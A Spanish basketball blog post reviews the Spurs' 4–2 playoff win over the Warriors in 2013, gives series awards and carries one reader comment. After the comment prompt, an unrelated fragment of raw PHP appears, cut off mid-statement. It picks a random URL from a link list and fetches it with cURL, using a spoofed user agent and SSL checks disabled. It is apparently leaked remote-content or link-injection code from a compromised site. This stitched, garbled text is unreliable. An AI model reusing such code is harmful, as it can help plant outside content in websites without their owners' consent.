San Antonio Spurs 4 – 2 Golden State Warriors

17 de May de 2013 por TheDeerHunter

Casualidad. Clavamos el resultado de una serie que empezó como el súmmum de lo impredecible. La fue aplacando el peso de la lógica y la practicidad que tantos éxitos han producido a los tejanos y el desgaste de un equipo aún no preparado para estas guerras.

Todos nos ilusionamos y nos enamoramos del descaro de Stephen Curry y sus compañeros pero dudo que nadie creyera seriamente que su límite era mucho más alto. La gran virtud de los Spurs, los grandes favoritos a priori en cualquier medio, es que han competido en terreno ajeno pero han sabido llevarlo al propio donde no tenían rival en esta serie. Lástima para el espectador, que siempre soñará con 7 duelos como el primero, pero gloria a Popovich y a los suyos, con esos genes de campeones que no se los quitará nadie.

Hablábamos en su día de varias claves. La experiencia, el aspecto mental, el control del tempo, la defensa del perímetro, la capacidad de adaptación… Era prácticamente una enumeración de las características naturales de los San Antonio Spurs que hemos conocido, las que les ha hecho grandes. Por supuesto que el peso de los años era un hándicap para ellos, refiriéndonos al eje veterano del equipo, pero hasta en eso la serie ha estado de su lado con el crítico estado del artista Curry o por la semi-ausencia de David Lee que mucha gente creyó ventaja.

Pero pareciera que insinuamos que ha sido un paseo en barca avanzar a la final de conferencia. En absoluto. El descarado talento de los Warriors daba para haber salido de San Antonio con un 0-2 y no podría haber sorprendido a nadie llegar al 5º con los Spurs al borde de la eliminación. A medida que las infiltraciones perdían efectividad y Popovich ajustaba su tela de araña la serie se hizo excesivamente larga para los chicos de la Bahía, pero nunca sabremos qué hubiera ocurrido si hubieran llegado al 5º en condiciones de cerrar la serie. 

PREMIOS

MVP: Si erramos en no dárselo a Thibodeau en la Nets-Bulls no tropezaremos dos veces en la misma piedra. Magistral Gregg Popovich, el zorro blanco. De manual el uso que ha dado a Leonard y Green. Mención especial al eterno Tim Duncan, como también a Tony Parker, la punta de lanza del equipo.

Rookie: Doctorado para Harrison Barnes, demoledor y audaz con el viento a favor pero sólido y reflexivo en los momentos difíciles. Ha mostrado una templanza impropia de un jugador de primer año.

Sorpresa: La aportación defensiva de Kawhi Leonard ha sido vital para que su equipo siga vivo en la competición. 3er espada en lo ofensivo y unos números brutales. Los grandes jugadores suben prestaciones en la postemporada. Hay que observar detenidamente su incremento.

Decepción: Pocas. Si acaso no haber podido disfrutar de un séptimo partido y también que las lesiones forman parte de este juego.

Esfuerzo en vano: El guerrero cojo Stephen Curry. A pesar de jugar infiltrado repetidas veces te firma unos promedios de 22.5 ptos, 3.3 reb, 6.8 asistencias, 1.2 robos… ¿Qué hubiéramos dado por verle jugar sano toda la serie?

Comenta

Un comentario a esta entrada

  1. Esteban dice:
    #1

    Si pensamos en la ausencia de david lee, la lesion de curry, a medias bogut, el retiro en activo derichaed jefferson y la ausencia de todo el año de brandon rush, quedo un equipo demasiado corto para enfrentarse a un equipo tan largo como los spurs

    Una pena, las lesiones marcan demasido en una serie tan corta

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>